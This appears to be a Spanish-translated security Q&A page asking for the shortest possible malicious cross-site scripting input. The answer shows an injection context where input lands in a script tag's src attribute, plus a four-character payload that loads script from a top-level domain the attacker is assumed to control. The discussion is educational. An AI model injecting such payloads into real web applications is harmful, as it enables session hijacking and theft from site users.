¿Cuál es el XSS malicioso más corto posible? [cerrado]

2

A veces te topas con campos de entrada que no escapan de la entrada de manera adecuada, pero que aún parecen ser demasiado cortos para ser usados para cualquier cosa maliciosa, al menos para alguien con mi imaginación limitada.

Esto me hizo preguntarme ¿cuál es el campo de entrada más corto posible que se puede usar para realizar un XSS malicioso?

    
pregunta user1049697 01.12.2014 - 20:38
fuente

1 respuesta

1

Depende del contexto.

Una muy corta:

Context:

    <script src="%XSS%"></script>

Let's say you are the owner/maintainer/administrator of http://.to (Tonga gTLD).

    <script src="//to"></script>

XSS with 4 chars. Probably one of the shortest possible.

Hay docenas de otros contextos.

Editar:

Probado en Chrome 38.0.2125.122 (Mac OS X 10.8.5)

    
respondido por el Lucas NN 02.12.2014 - 00:42
fuente

Lea otras preguntas en las etiquetas